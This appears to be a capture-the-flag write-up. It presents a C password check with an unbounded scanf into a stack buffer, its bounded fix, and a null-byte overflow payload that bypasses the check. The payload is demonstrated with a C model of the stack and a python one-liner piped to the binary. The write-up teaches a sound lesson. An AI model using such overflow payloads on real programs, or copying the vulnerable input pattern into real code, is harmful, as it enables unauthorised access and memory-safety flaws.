#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(void) {
char passwd[16] = ""; // array to store the password read from .passwd
char password[16] = ""; // array to store the password
FILE *fp = fopen(".passwd", "r");
fread(passwd, 1, 15, fp);
fclose(fp);
passwd[15] = '\0';
printf("Enter the password: ");
scanf("%s", password); // read the password from the user
if (strcmp(password, passwd) == 0) {
printf("good job\n");
} else {
printf("permission denied\n");
}
return 0;
}
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(void) {
char passwd[16] = ""; // array to store the password read from .passwd
char password[16] = ""; // array to store the password
FILE *fp = fopen(".passwd", "r");
fread(passwd, 1, 15, fp);
fclose(fp);
passwd[15] = '\0';
printf("Enter the password: ");
scanf("%15s", password); // read the password from the user; the width limits the input to 15 bytes plus the terminating NUL, so it no longer overflows
if (strcmp(password, passwd) == 0) {
printf("good job\n");
} else {
printf("permission denied\n");
}
return 0;
}
The objective is to detect the buffer overflow and exploit it to print "good job".
Exploitation
This program is vulnerable to a stack buffer overflow. The password array has a size of 16 characters, but scanf("%s") never checks the length of what the user types: it copies the input up to the first whitespace character and then appends a terminating null byte. So if the user enters a password longer than 15 characters, the extra bytes overwrite the adjacent memory locations.
As explained in the "operation of the stack" part, variables are stored on the stack in the same order that they are declared: password sits at the lower address and passwd immediately above it, so the bytes written past the end of password land in passwd. (The exact layout depends on the compiler and its optimisation level; confirm it in a debugger before building the payload.)
Here, after sending 32 bytes of 0x41, the memory reserved on the stack for password and for passwd holds the same value (16 * 0x41 each), yet the if condition is not satisfied. This happens because, although a fixed amount of space is reserved for each variable, strcmp does not know where that space ends: it reads each string until it meets a 0x00 byte, even beyond the space initially reserved for the variable. The terminator that passwd[15] = '\0' had placed was overwritten by the overflow, and the only terminator left is the one scanf appended after the 32nd byte. Thus, seen as C strings, password = 32 * 0x41 while passwd = 16 * 0x41, and they differ.
In order to pass the if condition, password and passwd need to have the same value. To do that, a null byte must be injected in the input: 15 filler bytes, then a 0x00 byte that terminates password at offset 15, then 15 more filler bytes that overwrite passwd. The terminator that scanf appends lands in passwd[15], so both strings read as the same 15-byte value. This works because %s stops on whitespace, not on 0x00: the embedded null byte is stored like any other character.
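The following program models the overflow and the null-byte payload described above. It is an added example, not part of the original write-up or of the challenge binary: it assumes the stack layout the text describes (password immediately below passwd, with a little slack above), uses a constructed value in place of the real .passwd contents, and the names check_password, build_payload and the offset macros are mine. A flat byte array stands in for the stack frame so the overflow is reproduced without undefined behaviour.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Model of the challenge's stack frame, as the write-up assumes it:
 * password (user input) lies 16 bytes below passwd (contents of .passwd),
 * followed by 16 bytes of slack standing in for whatever else is on the
 * stack. The real program would keep writing past the end of this array. */
#define BUF_SIZE     16
#define PASSWORD_OFF 0
#define PASSWD_OFF   (PASSWORD_OFF + BUF_SIZE)
#define FRAME_SIZE   (PASSWD_OFF + BUF_SIZE + 16)

/* Constructed stand-in for the 15 bytes read from .passwd (hypothetical). */
static const char SECRET[BUF_SIZE] = "s3cr3t_passwd!!";

/* Reproduces scanf("%s", password): copy bytes until whitespace or end of
 * input, with no length check, then append the terminating NUL. A 0x00
 * byte is not whitespace, so it is copied like any other character. */
static void unsafe_scanf_s(unsigned char *frame, const unsigned char *in, size_t len)
{
    size_t i = 0;
    while (i < len && i < FRAME_SIZE - 1 && !isspace(in[i])) {
        frame[PASSWORD_OFF + i] = in[i];
        i++;
    }
    frame[PASSWORD_OFF + i] = '\0';
}

/* Runs the challenge's check on the model frame with the given input.
 * Returns 1 for "good job", 0 for "permission denied". */
int check_password(const unsigned char *input, size_t len)
{
    unsigned char frame[FRAME_SIZE];
    memset(frame, 0, sizeof frame);
    memcpy(frame + PASSWD_OFF, SECRET, BUF_SIZE);  /* fread + passwd[15] = '\0' */
    unsafe_scanf_s(frame, input, len);
    return strcmp((const char *)frame + PASSWORD_OFF,
                  (const char *)frame + PASSWD_OFF) == 0;
}

/* Builds the payload from the write-up: 15 filler bytes, a NUL that ends
 * password at offset 15, then 15 more filler bytes that overwrite passwd.
 * The NUL scanf appends lands in passwd[15], so both strings become the
 * same 15-byte value. out must hold at least 31 bytes; returns the length. */
size_t build_payload(unsigned char *out, unsigned char filler)
{
    memset(out, filler, BUF_SIZE - 1);
    out[BUF_SIZE - 1] = '\0';
    memset(out + BUF_SIZE, filler, BUF_SIZE - 1);
    return 2 * BUF_SIZE - 1;
}

/* 32 x 'A' with no embedded NUL: the attempt the write-up shows failing. */
int try_plain_overflow(void)
{
    unsigned char in[2 * BUF_SIZE];
    memset(in, 'A', sizeof in);
    return check_password(in, sizeof in);
}

/* The null-byte payload: succeeds without knowing the .passwd contents. */
int try_null_byte_payload(void)
{
    unsigned char in[2 * BUF_SIZE];
    size_t n = build_payload(in, 'A');
    return check_password(in, n);
}

int main(void)
{
    printf("32 x 'A'            : %s\n",
           try_plain_overflow() ? "good job" : "permission denied");
    printf("15 x 'A', NUL, 15 x 'A': %s\n",
           try_null_byte_payload() ? "good job" : "permission denied");
    return 0;
}
```

Against the real binary the same payload is delivered on stdin, for example with `python3 -c 'import sys; sys.stdout.buffer.write(b"A"*15 + b"\x00" + b"A"*15 + b"\n")' | ./challenge` (the binary name is a placeholder). The trailing newline is what stops %s. Note that the second listing above, with `scanf("%15s", ...)`, is immune: at most 15 bytes are ever stored in password, so the embedded null byte and the second run of filler never reach passwd.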